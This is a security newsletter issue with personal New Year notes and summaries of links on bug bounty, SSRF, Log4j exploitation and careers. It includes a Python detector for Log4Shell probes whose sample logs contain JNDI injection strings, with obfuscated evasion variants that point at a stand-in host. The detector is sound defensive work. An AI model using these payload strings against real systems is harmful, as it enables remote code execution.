Hive Five 51 - Happy New Year
Hi friends,
Happy New Year from the hive!
I hope you'll get one step closer to reaching your dreams. Both professionally and personally, 2021 was a great year for me.
Through my newsletter, website, and job at Bugcrowd, I was able to meet, reach and help a lot of people. And it meant the world to me. There's no better feeling than giving back.
In 2021, I also gained new insight through introspection. I also found stoicism, or did it find me? I built a reading habit and started mind mapping. On the health front, I started a daily running habit. Lastly, I was lucky enough to meet with infosec friends, both old and new.
This year, I set out to improve the processes above while adding new ones for my overall goal to be more intentional and mindful.
Let's take this week by swarm!
The Bee's Knees
Ask TomNomNom anything: He'll do a stream some time in the next couple of weeks to answer them. The last time he did this it was a four-hour stream.
A Different Kind of Root - How a Dentist Passed the OSCP: TLDR - you can do it, there's no doubt about it. You just have to prep smart. Do the groundwork, jump into PWK, then finish up with PG. The exam is a psychological chess match between you and the machines.
Turning bad SSRF to good SSRF - Websphere Portal: CVEs do not exist for these issues as the vendor is a CNA and refuses to provide us with CVEs. Advisory: Websphere Portal SSRFs & Post Auth RCE.
Hacking a VW Golf Power Steering ECU - Part 1: Attempts at modifying the firmware of an Electronic Power Steering (EPS) ECU from a 2010 Volkswagen Golf Mk6. This steering rack is probably present in all VW PQ platform cars, starting from 2008 up to the present day.
Support the Hive
Get $100 to try DigitalOcean. The go-to VPS for bug bounty hunters. I use it for all of my own recon and automation needs, plus it also doubles as a VPN. They have every cloud resource you need at an affordable price.
Buzzworthy
Current events
TOOOL needs your help: Someone defrauded them out of $20k, their bookkeeper ghosted them, and the bank isn't helpful.
LogMePwn v2.0 - Multi-protocol support: A fully automated, reliable, super-fast, mass scanning and validation toolkit for the Log4J RCE CVE-2021-44228 vulnerability.
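LogMePwn validates Log4Shell (CVE-2021-44228) from the outside; the defender's counterpart is spotting the probes in your own logs, which a plain grep for "jndi" misses once attackers nest lookups. The following detection logic is an added example, not code from the page, from LogMePwn or from any vendor. The log lines are constructed, and the resolver approximates only the Log4j 2 lookup forms attackers used for obfuscation (`${x:-default}`, `${lower:..}`, `${upper:..}`); anything else is left in place so it stays visible.

```python
import re

# Constructed access-log lines (not from the page). Lines 2-5 carry Log4Shell
# (CVE-2021-44228) probes; 3-5 use nested lookups to evade a plain "jndi" grep.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://203.0.113.10/a}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.10/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${env:NOPE:-j}ndi:dns://203.0.113.10/a}"',
    '10.0.0.10 - - "GET /?q=${date:yyyy} HTTP/1.1" 200 "curl/7.79"',
]

# Innermost lookups only: a body with no further "${" or "}" inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_inner(body):
    """Evaluate one innermost lookup the way Log4j 2 would, for the forms
    that matter to evasion. Unknown lookups are returned unchanged so they
    stay visible in the normalised text (an approximation, not Log4j itself)."""
    # "${anything:-default}" evaluates to the default, whatever "anything" is;
    # this also covers the bare "${::-j}" form.
    if ":-" in body:
        return body.split(":-", 1)[1]
    m = re.fullmatch(r"(lower|upper):(.*)", body, re.IGNORECASE | re.DOTALL)
    if m:
        return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()
    return "${" + body + "}"


def normalize(text, max_rounds=32):
    """Repeatedly collapse innermost lookups until nothing changes, so
    "${${lower:j}ndi:...}" becomes "${jndi:...}". The round limit bounds
    the work on adversarial input; unresolved lookups are a fixed point."""
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve_inner(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def is_log4shell_probe(line):
    """True if the line contains a JNDI lookup after de-obfuscation."""
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return (original, normalised) pairs for the lines that look like probes."""
    return [(line, normalize(line)) for line in lines if is_log4shell_probe(line)]


if __name__ == "__main__":
    for original, norm in scan(SAMPLE_LOGS):
        print(f"PROBE {norm}")
```

Run it over any field attackers control (User-Agent, X-Forwarded-For, query strings, form fields), not just the request line. A hit tells you a probe arrived, not that it fired; the validation step LogMePwn performs (an out-of-band DNS or LDAP callback) is what confirms a vulnerable host.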
Celebrate
Dazzy is joining Mandiant Red Team: Congrats!
Christopher's health journey: Amazing!
MorningStar had a great bug bounty year: Awesome work!
Six2dez celebrated reconFTW's first birthday: Here's to many more!
ca$s:e crushed her goals: Let's go!
Career Corner
Canva has heaps of security roles open: They're looking for smart, driven people who want to be a part of Canva's journey. Australia, remote; happy to discuss international remote.
Ben's advice to employers in the security space: There are barely any qualified and experienced people in this field. Only hiring experts is not sustainable.
Articles
Secjuice 2021 Writer of the Year Winner - Andy From Italy: Secjuice is pleased to congratulate the 2021 winner of our annual Secjuice Writer of the Year awards, Andy From Italy.
Another Log4j on the fire - Unifi: In this article, we are going to exploit Log4j vulnerabilities in Unifi software, get a reverse shell, and leverage our access to add our own administrative user to the Unifi MongoDB instance.
Fixing the Unfixable - Story of a Google Cloud SSRF: The post is nominated for the 2021 GCP VRP Prize.
Losers Exist, Don't Hire Them: This is an internet re-post of a piece by Bryan Goldberg that is no longer available online.
Spaceraccoon's 2Q21 - New Year's Reflections: "This may be the most important proposition revealed by history: 'At the time, no one knew what was coming.'" - Haruki Murakami.
Resources
Mohsin asks: what is your mindset when hunting on a public program?
Introduction to Malware Analysis and Reverse Engineering: This class introduces CS graduate students to malware concepts, malware analysis, and black-box reverse engineering techniques.
Blocksec CTFs: A curated list of blockchain security Wargames, Challenges, and Capture the Flag (CTF) competitions and solution writeups.
Code Review Checklist: Does this code change accomplish what it is supposed to do? Can this solution be simplified?
Videos
Dropped or adopted in 2021… app and hardware end-of-year review.
UHC - NodeBlog: The box will be uploaded to HackTheBox by January 5th.
SSRF - Lab #5 SSRF with filter bypass via open redirection vulnerability | Long Version: This application's stock check feature is vulnerable to SSRF.
Advanced Directory Traversal Techniques: This video covers advanced strategies to test for directory traversal issues.
Audio
Spreading the Networking Vibes with Serena (shenetworks): Serena is a Network Engineer who specializes in Data Center Compute and Virtualization.
Alice and Bob learn application security - Chapter 10 - Continuous learning conclusion.